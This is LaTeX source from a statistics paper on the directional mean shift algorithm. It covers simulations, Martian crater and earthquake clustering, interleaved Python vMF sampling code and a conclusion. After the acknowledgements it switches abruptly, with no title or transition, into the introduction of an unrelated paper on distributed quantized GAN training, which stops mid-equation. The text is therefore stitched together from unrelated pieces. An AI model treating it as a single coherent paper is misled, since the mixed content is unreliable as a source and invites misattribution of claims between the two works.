\subsection{Simulation Studies}
\subsubsection{Circular Case}
To evaluate the effectiveness of Algorithm~\ref{Algo:MS}, we first randomly generate 60 data points from a circular density
$$f_1(x)=\frac{e^{-|x|}}{4(1-e^{-\pi})}\cdot \mathbbm{1}_{[-\pi,\pi]}(x)+\frac{1}{4\pi \mathcal{I}_0(6)}\exp\left[6 \cos\left(x-\frac{\pi}{2} \right) \right],$$
which is a mixture of a Laplace density with mean 0 and scale 1 truncated to $[-\pi,\pi]$ and a von Mises density with mean $\frac{\pi}{2}$ and concentration parameter $\nu=6$. The von Mises(-Fisher) distributed samples are generated via rejection sampling with the uniform distribution as the proposal density. The true local modes are 0 and $\frac{\pi}{2}$ in terms of angular representations or $(1,0)$ and $(0,1)$ in Cartesian coordinates. The directional KDE on the simulated data and directional mean shift iterations are presented in Figure~\ref{fig:One_d_MS}. The bandwidth parameter here is selected as $h=0.3 < h_{\text{ROT}} \approx0.4181$ because the aforementioned rule of thumb $h_{\text{ROT}}$ tends to oversmooth when the underlying density is not von Mises distributed. In addition, the tolerance level for terminating the algorithm is set to $\epsilon=10^{-7}$.
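The rejection sampler for the von Mises component can be sketched as follows (our illustration): with a uniform proposal on $[-\pi,\pi]$, a proposal $x$ is accepted with probability $\exp\left[\nu\left(\cos(x-\mu)-1\right)\right]$, since the target density attains its maximum at $x=\mu$.

```python
import numpy as np

def sample_vonmises_rejection(n, mu, nu, rng):
    # Rejection sampling from the von Mises density with a uniform proposal
    # on [-pi, pi]: accept a proposal x with probability
    # exp(nu * (cos(x - mu) - 1)).
    out = []
    while len(out) < n:
        x = rng.uniform(-np.pi, np.pi, size=2 * n)
        u = rng.uniform(0.0, 1.0, size=2 * n)
        out.extend(x[u < np.exp(nu * (np.cos(x - mu) - 1.0))])
    return np.array(out[:n])
```

The acceptance rate is $\mathcal{I}_0(\nu)e^{-\nu}$ (roughly $0.17$ for $\nu=6$), which is acceptable for the moderate concentrations used here.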
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step0.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step11.pdf}
\caption{Step 11}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step_conv.pdf}
\caption{Step 45 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step0_cir.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step11_cir.pdf}
\caption{Step 11}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_Step_conv_cir.pdf}
\caption{Step 45 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_MC.pdf}
\caption{Mode clustering (viewed on function values)}
\end{subfigure}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_1d_MC_cir.pdf}
\caption{Mode clustering (viewed on $\Omega_1$)}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on simulated data on $\Omega_1$.
{\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) on a unit circle.
{\bf Panel (g) and (h):} Visualization of the affiliations of data points after mode clustering.}
\label{fig:One_d_MS}
\end{figure}
Figure~\ref{fig:One_d_MS} empirically demonstrates the validity of Algorithm~\ref{Algo:MS} on the unit circle $\Omega_1$, in which all the simulated data points converge to the local modes of the circular density estimator. In addition, the misclassification rate in this simulation study is 0.1.
\subsubsection{Spherical Case} \label{sec:spherical}
We simulate 1000 data points from the following density
$$f_3(\bm{x}) = 0.3\cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_1,\nu_1)+ 0.3\cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_2,\nu_2) + 0.4\cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_3,\nu_3)$$
with $\bm{\mu}_1 \approx (-0.35, -0.61,-0.71)$, $\bm{\mu}_2 \approx (0.5,0,0.87)$, $\bm{\mu}_3=(-0.87,0.5,0)$ (or $[-120^{\circ},-45^{\circ}]$, $[0^{\circ},60^{\circ}]$, $[150^{\circ},0^{\circ}]$ in their precise spherical [longitude, latitude] coordinates), and $\nu_1=\nu_2=8$, $\nu_3=5$. The bandwidth parameter is selected using \eqref{bw_ROT}, and the tolerance level for terminating the algorithm is again set to $\epsilon=10^{-7}$. The results are presented in Figure \ref{fig:Two_d_ThreeM}.
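While the text uses rejection sampling, exact vMF samples on $\Omega_2$ can alternatively be drawn via the tangent-normal decomposition (a special case of the Ulrich--Wood algorithm): for $q=2$, the cosine $w=\bm{\mu}^T\bm{X}$ has density proportional to $e^{\nu w}$ on $[-1,1]$ and admits inverse-CDF sampling. The following sketch is our own illustration:

```python
import numpy as np

def sample_vmf_sphere(n, mu, nu, rng):
    # Exact vMF sampling on Omega_2 (the unit sphere in R^3): draw the
    # cosine w = mu^T x by inverse CDF (its density is proportional to
    # exp(nu * w) on [-1, 1] when q = 2), then a uniform direction in the
    # tangent plane at mu.
    mu = mu / np.linalg.norm(mu)
    u = rng.uniform(size=n)
    w = 1.0 + np.log(u + (1.0 - u) * np.exp(-2.0 * nu)) / nu
    w = np.clip(w, -1.0, 1.0)
    # orthonormal basis of the tangent plane at mu
    a = np.array([1.0, 0.0, 0.0]) if abs(mu[0]) < 0.9 else np.array([0.0, 1.0, 0.0])
    e1 = a - (a @ mu) * mu
    e1 /= np.linalg.norm(e1)
    e2 = np.cross(mu, e1)
    phi = rng.uniform(0.0, 2.0 * np.pi, size=n)
    tang = np.outer(np.cos(phi), e1) + np.outer(np.sin(phi), e2)
    return w[:, None] * mu + np.sqrt(1.0 - w**2)[:, None] * tang
```

Sampling from the mixture then amounts to drawing each observation's component label from the mixture weights $(0.3, 0.3, 0.4)$ and calling the sampler with the corresponding $(\bm{\mu}_j,\nu_j)$.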
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/MS_TripMode_Step0_cyl.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/MS_TripMode_MidStep_cyl.pdf}
\caption{Step 5}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/MS_TripMode_Step_conv_cyl.pdf}
\caption{Step 28 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_Step0_ortho.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_MidStep_ortho.pdf}
\caption{Step 5}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_Step_conv_ortho.pdf}
\caption{Step 28 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.8\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/MS_TripMode_MC_affi.pdf}
\caption{Mode clustering (Hammer projection view)}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on simulated data with three local modes on $\Omega_2$.
{\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm displayed in a cylindrical equidistant view.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) in an orthographic view.
Note: two local modes are at the back of the sphere; thus, we cannot directly see them.
{\bf Panel (g):} Clustering result under the Hammer projection (page 160 in \citealt{Snyder1989album}).}
\label{fig:Two_d_ThreeM}
\end{figure}
In Figure~\ref{fig:Two_d_ThreeM}, all simulated data points converge to the local modes of the estimated directional density under the application of Algorithm~\ref{Algo:MS}; therefore, all the original data points are clustered according to where they converge. The confusion matrix in this simulation study is $\begin{bmatrix}
\bm{278} & 0 & 9\\
0 & \bm{323} & 1\\
20 & 8 & \bm{361}\\
\end{bmatrix}$ and the misclassification rate is thus 0.038.
Moreover, the total number of iterative steps is much lower than in the single-mode case in Appendix~\ref{Appendix:Two_d_OneM} (Figure~\ref{fig:Two_d_OneM}). We also observe that most of the data points already converge to the local modes of the directional KDE after a few initial steps, while most of the subsequent iterations handle those points that are geodesically far away from an estimated local mode and have small estimated (tangent/Riemannian) gradients on their iterative paths.
\subsubsection{$q$-Directional Case with $q>2$}
Our algorithmic formulation of the directional mean shift algorithm (Algorithm~\ref{Algo:MS}) and its associated learning theory are valid on any general (intrinsic) dimension $q$ of $\Omega_q$. For this reason, we are also interested in how the algorithm behaves as the dimension $q$ of directional data increases. We randomly simulate 1000 data points from each of the following densities repeatedly,
$$\sum\limits_{i=1}^4 0.25 \cdot f_{\text{vMF}}(\bm{x};\bm{\mu}_{i,q},\nu')$$
with $\bm{\mu}_{i,q} = \bm{e}_{i,q+1}\in \Omega_q \subset \mathbb{R}^{q+1}$ for $q=3,4,...,12$ and $i=1,...,4$, where the concentration parameter is $\nu'=10$ and the mixture weights of the density components are equal. Here, $\left\{\bm{e}_{i,q+1}\right\}_{i=1}^{q+1} \subset \Omega_q$ is the standard basis of the ambient Euclidean space $\mathbb{R}^{q+1}$. For each value of the dimension $q$, we repeat the data simulation process 20 times and compute the average misclassification rate of mode clustering with Algorithm~\ref{Algo:MS} on each simulated data set. Figure~\ref{fig:boxplot} shows the boxplots of the misclassification rates.
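The data-generation step above requires sampling from a von Mises-Fisher distribution on $\Omega_q \subset \mathbb{R}^{p}$ with $p = q+1$. A minimal numpy sketch using the rejection sampler of Wood (1994) is given below (function and variable names are ours, not from the paper):

```python
import numpy as np

def sample_vmf(mu, kappa, n, rng):
    """Draw n points from vMF(mu, kappa) on the unit sphere in R^p
    (here p = q + 1), using the rejection sampler of Wood (1994)."""
    mu = np.asarray(mu, dtype=float)
    p = mu.size
    b = (p - 1) / (2.0 * kappa + np.sqrt(4.0 * kappa**2 + (p - 1) ** 2))
    x0 = (1.0 - b) / (1.0 + b)
    c = kappa * x0 + (p - 1) * np.log(1.0 - x0**2)
    e1 = np.zeros(p)
    e1[0] = 1.0
    u = e1 - mu                 # Householder direction mapping e1 onto mu
    norm_u = np.linalg.norm(u)
    out = np.empty((n, p))
    for i in range(n):
        while True:             # rejection sampling for w = <x, mu>
            z = rng.beta((p - 1) / 2.0, (p - 1) / 2.0)
            w = (1.0 - (1.0 + b) * z) / (1.0 - (1.0 - b) * z)
            if kappa * w + (p - 1) * np.log(1.0 - x0 * w) - c >= np.log(rng.random()):
                break
        v = rng.standard_normal(p - 1)
        v /= np.linalg.norm(v)  # uniform direction orthogonal to e1
        x = np.concatenate(([w], np.sqrt(1.0 - w**2) * v))
        if norm_u < 1e-12:      # mu is already e1
            out[i] = x
        else:
            uh = u / norm_u
            out[i] = x - 2.0 * (uh @ x) * uh  # reflect e1 onto mu
    return out

rng = np.random.default_rng(1)
mu = np.array([1.0, 1.0, 0.0, 0.0]) / np.sqrt(2.0)
X = sample_vmf(mu, kappa=50.0, n=500, rng=rng)
```

A mixture such as the one above is then obtained by first drawing the component index with the mixture weights and calling the sampler with the chosen mean direction.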
\begin{figure}
\centering
\includegraphics[width=0.8\linewidth]{Figures/misrate_boxplot3_12.pdf}
\caption{Boxplots of misclassification rates of mode clustering under different values of dimension $q$}
\label{fig:boxplot}
\end{figure}
As the dimension $q$ of the directional data becomes larger, the misclassification rate of mode clustering with Algorithm~\ref{Algo:MS} gradually increases toward 1 (the worst case), which implies that the ability of Algorithm~\ref{Algo:MS} to identify the density component from which a data point is simulated deteriorates with the dimension. This inferior performance of the directional mean shift algorithm on higher-dimensional hyperspheres is not surprising because (i) we do not fine-tune the bandwidth parameter (but simply apply the rule of thumb \eqref{bw_ROT}), and (ii) the algorithm is subject to the curse of dimensionality (see also Section~\ref{Sec:Com_Complexity}). However, since directional data in real-world applications mostly lie on a (hyper)sphere with dimension $q\leq 3$, Algorithm~\ref{Algo:MS} is effective in practice, as we will demonstrate in Section~\ref{Sec:real_world_app}.
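For the von Mises kernel, one iteration of the directional mean shift update reduces to a kernel-weighted average of the data projected back onto the sphere. The sketch below illustrates this special case (it is a simplified stand-in for Algorithm~\ref{Algo:MS}, which supports general kernels; names are ours):

```python
import numpy as np

def directional_mean_shift(X, y0, h, max_iter=500, eps=1e-7):
    """Mean shift on the unit sphere with the von Mises kernel.
    X: (n, p) array of unit vectors; y0: (p,) starting point."""
    y = y0 / np.linalg.norm(y0)
    for _ in range(max_iter):
        w = np.exp(X @ y / h**2)          # von Mises kernel weights
        y_new = X.T @ w
        y_new /= np.linalg.norm(y_new)    # project back onto the sphere
        if np.linalg.norm(y_new - y) < eps:
            return y_new
        y = y_new
    return y

# A single concentrated cluster around e1 for illustration.
rng = np.random.default_rng(0)
X = np.array([1.0, 0.0, 0.0]) + 0.1 * rng.standard_normal((200, 3))
X /= np.linalg.norm(X, axis=1, keepdims=True)
mode = directional_mean_shift(X, np.array([0.8, 0.6, 0.0]), h=0.3)
# The estimated mode should lie close to the cluster's mean direction.
mean_dir = X.mean(axis=0)
mean_dir /= np.linalg.norm(mean_dir)
```

Running every data point through this fixed-point iteration and grouping points by their limits yields the mode clustering used throughout this section.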
\subsection{Real-World Applications}
\label{Sec:real_world_app}
We illustrate the practical relevance of the directional mean shift algorithm (Algorithm~\ref{Algo:MS}) with two applications in astronomy and seismology.
\subsubsection{Craters on Mars}
The distribution and cluster configuration of craters on Mars shed light on the planetary subsurface structure (water or ice), relative surface ages, resurfacing history, and past geologic processes \citep{Lakes_On_Mars,BARLOW2015}. \cite{Unif_test_hypersphere2020} conducted three different statistical tests (Cramer-von Mises, Rothman, and Anderson-Darling-like tests) on Martian crater data to statistically validate the non-uniformity of the crater distribution on Mars. We apply the directional KDE \eqref{Dir_KDE} together with the directional mean shift algorithm to further estimate the density of craters and determine crater clusters on the surface of Mars. Martian crater data are publicly available on the Gazetteer of Planetary Nomenclature database (\url{https://planetarynames.wr.usgs.gov/AdvancedSearch}) of the International Astronomical Union (IAU). The positions of craters are recorded in areocentric coordinates (the planetocentric coordinates on Mars) so that the areocentric longitudes range from $0^{\circ}$ to $360^{\circ}$ and areocentric latitudes range from $-90^{\circ}$ to $90^{\circ}$. As craters with areocentric longitudes greater than $180^{\circ}$ are on the western hemisphere of Mars, we transform their longitudes back to the interval $(-180^{\circ},0^{\circ})$. (Note that $360^{\circ}$ in longitude corresponds to $0^{\circ}$ west/east after transformation.) In addition, we remove those small craters whose diameters are less than 5 kilometers from the crater data, as their presence may provide spurious information. After trimming, the data set contains 1653 craters. The bandwidth parameter is selected using \eqref{bw_ROT}, which yields $h_{\text{ROT}} \approx 0.338$ for the trimmed data set. The estimated distribution of craters on Mars and the clustering results are presented in Figure~\ref{fig:Mars_data}.
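The longitude transformation described above is a single modular shift; a small helper in Python (the function name is ours):

```python
import numpy as np

def to_west_east(lon_deg):
    """Map areocentric longitudes from [0, 360) to [-180, 180), so that
    longitudes above 180 degrees become western (negative) longitudes."""
    lon = np.asarray(lon_deg, dtype=float)
    return (lon + 180.0) % 360.0 - 180.0

print(to_west_east([90.0, 190.0, 360.0]))  # 90 stays, 190 -> -170, 360 -> 0
```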
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/Mars_Step0_cyl.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/Mars_MidStep_cyl.pdf}
\caption{Step 17}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/Mars_conv_cyl.pdf}
\caption{Step 178 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_Step0_ortho.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_MidStep_ortho.pdf}
\caption{Step 17}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_conv_ortho.pdf}
\caption{Step 178 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.8\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/Mars_MC_affi.pdf}
\caption{Mode clustering (Hammer projection view)}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on Martian crater data.
The analysis is displayed in a similar way to Figure~\ref{fig:Two_d_ThreeM}. {\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm displayed in a cylindrical equidistant view.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) in an orthographic view.
{\bf Panel (g):} Clustering result under the Hammer projection. }
\label{fig:Mars_data}
\end{figure}
As illustrated in Figure~\ref{fig:Mars_data}, the directional mean shift algorithm is capable of recovering the local modes of the estimated Martian crater density. Because we do not fine-tune the bandwidth parameter, there is a spurious local mode around $(180^{\circ} W, 30^{\circ} S)$. Nevertheless, the mode clustering based on Algorithm~\ref{Algo:MS} succeeds in capturing two major crater clusters (or basins of attraction) on Mars, in which one cluster is densely cratered while the other is lightly cratered. This finding aligns with prior research on the Martian crater distribution, stating that Mars can be divided into two general classes of terrain \citep{SODERBLOM1974239}. In Appendix~\ref{Appendix:Mars_Data},
we perform mode clustering with various smoothing bandwidths to illustrate multi-scale structures in the data.
\subsubsection{Earthquakes on Earth}
Earthquakes on Earth tend to occur more frequently in some regions than others. We again leverage the directional KDE \eqref{Dir_KDE} as well as the directional mean shift algorithm to analyze earthquakes with magnitudes of 2.5+ occurring between 2020-08-21 00:00:00 UTC and 2020-09-21 23:59:59 UTC around the world. The earthquake data can be obtained from the Earthquake Catalog (\url{https://earthquake.usgs.gov/earthquakes/search/}) of the United States Geological Survey. The data set contains 1666 earthquakes worldwide for this one-month period. We use the default bandwidth estimator \eqref{bw_ROT}, which yields $h_{\text{ROT}} \approx 0.245$ on the earthquake data set, and set the tolerance level to $\epsilon=10^{-7}$ throughout the analysis.
Figure~\ref{fig:Earthquake} displays the results.
There are seven local modes recovered by the directional mean shift algorithm, and they are located near (from left to right and top to bottom in Panel (g) of Figure~\ref{fig:Earthquake}) the Gulf of Alaska, the west side of the Rocky Mountains in Nevada, the Caribbean Sea, the west side of the Andes mountains in Chile, the Middle East, Indonesia, and Fiji. These regions are well-known active seismic areas along subduction zones, and our clustering of earthquake data elegantly partitions earthquakes into these regions without any prior knowledge from seismology.
\begin{figure}
\captionsetup[subfigure]{justification=centering}
\centering
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/EQ_Step0_cyl.pdf}
\caption{Step 0}
\end{subfigure}
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/EQ_MidStep_cyl.pdf}
\caption{Step 10}
\end{subfigure}%
\hfil
\begin{subfigure}[t]{.32\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.8\linewidth]{Figures/EQ_conv_cyl.pdf}
\caption{Step 82 (converged)}
\end{subfigure}%
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/EQ_Step0_ortho.pdf}
\caption{Step 0}
\end{subfigure}
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/EQ_MidStep_ortho.pdf}
\caption{Step 10}
\end{subfigure}
\hfil
\begin{subfigure}{.32\textwidth}
\centering
\includegraphics[width=1\linewidth]{Figures/EQ_conv_ortho.pdf}
\caption{Step 82 (converged)}
\end{subfigure}
\hfil
\begin{center}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.85\linewidth]{Figures/EQ_mode_graph.pdf}
\caption{Local modes and contour lines on the world map}
\end{subfigure}
\begin{subfigure}[t]{.49\textwidth}
\centering
\includegraphics[width=1\linewidth,height=0.85\linewidth]{Figures/EQ_MS_affi.pdf}
\caption{Mode clustering on the world map}
\end{subfigure}
\end{center}
\caption{Directional mean shift algorithm performed on earthquake data for a one-month period.
The first two rows display the analysis similar to Figure~\ref{fig:Two_d_ThreeM}.
{\bf Panel (a)-(c):} Outcomes under different iterations of the algorithm displayed in a cylindrical equidistant view.
{\bf Panel (d)-(f):} Corresponding locations of points in panels (a)-(c) in an orthographic view.
{\bf Panel (g):} Contour plots of estimated density. {\bf Panel (h):} Clustering result using the directional mean shift algorithm.}
\label{fig:Earthquake}
\end{figure}
\section{Conclusion}
In this paper, we generalize the standard mean shift algorithm to directional data based on a total gradient (or differential) of the directional KDE and formulate it as a fixed-point iteration.
We derive the explicit forms of the (Riemannian) gradient and Hessian estimators from a general directional KDE and establish pointwise and uniform rates of convergence for the two derivative estimators. With these powerful uniform consistency results, we demonstrate that the collection of estimated local modes obtained by the directional mean shift algorithm is a statistically consistent estimator of the set of true local modes under some mild regularity conditions.
Additionally, the ascending property and convergence of the proposed algorithm are proved.
Finally, given a proper bandwidth parameter (or step size for other general gradient ascent algorithms on $\Omega_q$), we argue that the directional mean shift algorithm (and other general gradient ascent algorithms on $\Omega_q$) converges linearly to an (estimated) local mode within a small neighborhood of it, regardless of whether the population-level or sample-based version of gradient ascent is applied.
Possible future extensions of our work are as follows.
\begin{itemize}
\item \textbf{Bandwidth Selection}. Current studies on bandwidth selectors for directional kernel smoothing settings primarily optimize the directional KDE itself. Research on bandwidth selection for derivatives of the directional KDE, especially the gradient and Hessian estimators, has lagged behind. A well-designed bandwidth selector for the first-order derivatives of the directional KDE can further improve the algorithmic convergence rate of our algorithm in real-world applications. There are at least two common approaches to such bandwidth selection. The first is to calculate the explicit forms of the dominating constants in the bias and stochastic variation terms when deriving the pointwise convergence rates of the (Riemannian) gradient and Hessian estimators in Theorem~\ref{pw_conv_tang}. Then, under some assumptions on the underlying directional distribution, such as the von Mises-Fisher distribution, a directional analogue of the rule of thumb of \cite{Silverman1986} for the gradient and Hessian estimators can be derived, although the calculations may be heavy. Another approach is to rely on data-adaptive methods, such as cross-validation \citep{KDE_Sphe1987} and the bootstrap \citep{KDE_torus2011,Nonp_Dir_HDR2020}, which should be suitable for estimating the derivatives of the directional KDE. In addition, a bandwidth selector that is locally adaptive to the distribution of directional data is of great significance when the dimension is high.
\item \textbf{Accelerated Directional Mean Shift}. Another future direction is to accelerate the current directional mean shift algorithm when the sample size is large, as the number of iterations for convergence is over 150 in one of our real-world applications. There are several feasible approaches mentioned in Section~\ref{Sec:Intro} for the Euclidean mean shift algorithm. One of the most notable methods is the blurring procedure \citep{Fast_GBMS2006,GBMS2008}, in which the (Gaussian) mean shift algorithm is performed with a crucial modification that successively updates the data set for density estimation after each mean shift iteration. It has been demonstrated that the blurring procedure improves the convergence rate of the (Gaussian) mean shift algorithm to be cubic or even higher order with Gaussian clusters and an appropriate step size.
We present preliminary results of introducing blurring procedures into the directional mean shift algorithm with the von Mises kernel in Appendix~\ref{Appendix:BMS}, where the blurring procedures are able to substantially reduce the total number of iterations. However, in addition to those valid estimated local modes identified by the original directional mean shift algorithm, the blurring version also recovers some spurious local mode estimates (see Table~\ref{table:BMS} in Appendix~\ref{Appendix:BMS} for additional details). Because the current stopping criterion applied in the blurring directional mean shift algorithm is adopted from the criterion for Gaussian blurring mean shift \citep{Fast_GBMS2006}, we plan to develop an improved stopping criterion for the blurring directional mean shift algorithm and investigate its rate of convergence.
\item \textbf{Connections to the EM Algorithm}. As pointed out by \cite{MS_EM2007}, the Gaussian mean shift algorithm for Euclidean data is an EM algorithm, while the mean shift algorithm with a non-Gaussian kernel is a generalized EM algorithm. It is unclear whether the directional mean shift algorithm with the von Mises kernel is also an EM algorithm on a mixture of von Mises-Fisher distributions on $\Omega_q$ \citep{spherical_EM} or even a generalized EM algorithm when other kernels are used in Algorithm~\ref{Algo:MS}. Bridging this connection can help establish the linear rate of convergence for the algorithm from a different angle.
\end{itemize}
\acks{We thank the anonymous reviewers and AE for their constructive comments that improved the quality of this paper. We also thank members in the Geometric Data Analysis Reading Group at the University of Washington for their helpful comments. YC is supported by NSF DMS - 1810960 and DMS - 1952781, NIH U01 - AG0169761.}
\newpage
Generative adversarial networks (GANs)~\cite{goodfellow2014generative}, a kind of deep generative model, are designed to approximate the probability distribution of massive amounts of data. They have been demonstrated to be powerful for various tasks, including image generation~\cite{radford2016unsupervised}, video generation~\cite{vondrick2016generating}, and natural language processing~\cite{lin2017adversarial}, due to their ability to handle complex density functions. GANs are notoriously difficult to train since they are non-convex non-concave min-max problems. Gradient descent-type algorithms, such as Adagrad~\cite{duchi2011adaptive}, Adadelta~\cite{zeiler2012adadelta}, RMSprop~\cite{tieleman2012lecture}, and Adam~\cite{kingma2014adam}, are usually used for training generative adversarial networks. However, it has recently been demonstrated that gradient descent-type algorithms, which are mainly designed for minimization problems, may fail to converge when dealing with min-max problems~\cite{mertikopoulos2019optimistic}.
In addition, the learning rates of gradient-type algorithms are hard to tune when they are applied to train GANs, due to the absence of universal evaluation criteria such as an increasing or decreasing loss. Another critical problem in training GANs is that they usually contain a large number of parameters and thus may take days or even weeks to train.
During the past years, much effort has been devoted to solving the above problems. Some recent works show that the Optimistic Mirror Descent (OMD) algorithm has superior performance for min-max problems~\cite{mertikopoulos2019optimistic, daskalakis2018training, gidel2019a}; it introduces an extra-gradient step to overcome the divergence issue of gradient descent-type algorithms on min-max problems. Recently, Daskalakis et al.~\cite{daskalakis2018training} used OMD for training GANs on a single machine. In addition, a few works have also developed distributed extragradient descent-type algorithms to accelerate the training process of GANs \cite{jin2016scale, lian2017can, shen2018towards, tang2018d}. Recently, Liu et al.~\cite{liu2019decentralized} proposed distributed extragradient methods to train GANs with a decentralized network topology, but their method suffers from a large parameter-exchange overhead since the transmitted gradients are not compressed.
In this paper, we propose a novel distributed training method for GANs, named {Distributed Quantized Generative Adversarial Networks (DQGAN)}. The new method accelerates the training process of GANs in a distributed environment, and a quantization technique is used to reduce the communication cost. To the best of our knowledge, this is the first distributed training method for GANs with quantization. The main contributions of this paper are summarized as follows:
\begin{itemize}
\item We propose a {distributed optimization algorithm for training GANs}. Our main novelty is that the communicated gradients are quantized, so that our algorithm incurs a smaller communication overhead and further improves the training speed. Through the error compensation operation we design, we resolve the convergence problem caused by the quantized gradients.
\item We prove that the new method converges to a first-order stationary point at a non-asymptotic rate under some common assumptions. Our analysis indicates that the proposed method achieves a linear speedup in the parameter server model.
\item We conduct experiments to demonstrate the effectiveness and efficiency of our proposed method on both synthetic and real datasets. The experimental results verify the convergence of the new method and show that it improves the speedup of distributed training while achieving performance comparable to state-of-the-art methods.
\end{itemize}
The rest of the paper is organized as follows. Related works and preliminaries are summarized in Section~\ref{sec:notation_pre}. The detailed {DQGAN} and its convergence rate are described in Section~\ref{sec:method}. The experimental results on both synthetic and real datasets are presented in Section~\ref{sec:experiments}. Conclusions are given in Section~\ref{sec:conclusions}.
\section{Notations and Related Work}
\label{sec:notation_pre}
In this section, we summarize the notations and definitions used
in this paper, and give a brief review of related work.
\subsection{Generative Adversarial Networks}
\label{GANS}
Generative adversarial networks (GANs) consist of two components: a discriminator ($D$) that distinguishes between real data and generated data, and a generator ($G$) that generates data to fool the discriminator. We define $p_{r}$ as the real data distribution and $p_{n}$ as the noise distribution of the generator $G$. The objective of a GAN is to make the generator's data distribution approximate the real data distribution $p_{r}$, which is formulated as a joint loss function for $D$ and $G$~\cite{goodfellow2014generative}
\begin{equation}
\label{minmax_gan}
\min_{\theta\in\Theta} \max_{\phi\in\Phi} \mathcal{L} \left( \theta, \phi \right),
\end{equation}
where $\mathcal{L} \left( \theta, \phi \right)$ is defined as follows
\begin{equation}
\label{loss_gan}
\begin{aligned}
\mathcal{L} \left( \theta, \phi \right) \overset{\text{def}}{=}
\mathbb{E}_{\mathbf{x} \sim p_r} \left[\log D_{\phi}\left(\mathbf{x}\right) \right]
+ \mathbb{E}_{\mathbf{z} \sim p_{n}} \left[ \log \left( 1-D_{\phi} ( G_{\theta}(\mathbf{z}) ) \right) \right] .
\end{aligned}
\end{equation}
$D_{\phi}(\mathbf{x})$ denotes the discriminator, which outputs the probability of its input being a real sample. $\theta$ denotes the parameters of the generator $G$ and $\phi$ the parameters of the discriminator $D$.
However, (\ref{minmax_gan}) may suffer from the saturation problem at the early learning stage, which leads to vanishing gradients for the generator and an inability to train in a stable manner~\cite{goodfellow2014generative,arjovsky2017wasserstein}. We therefore adopt the loss of WGAN~\cite{goodfellow2014generative,arjovsky2017wasserstein}
\begin{equation}
\label{loss_gan1}
\begin{aligned}
\mathcal{L} \left( \theta, \phi \right) \overset{\text{def}}{=}
& \mathbb{E}_{\mathbf{x} \sim p_r} \left[D_{\phi}\left(\mathbf{x}\right)\right] - \mathbb{E}_{\mathbf{z} \sim p_{n}} \left[ D_{\phi} ( G_{\theta}(\mathbf{z}) ) \right].
\end{aligned}
\end{equation}
Training a GAN then turns into finding the following Nash equilibrium
\begin{equation}
\label{G3}
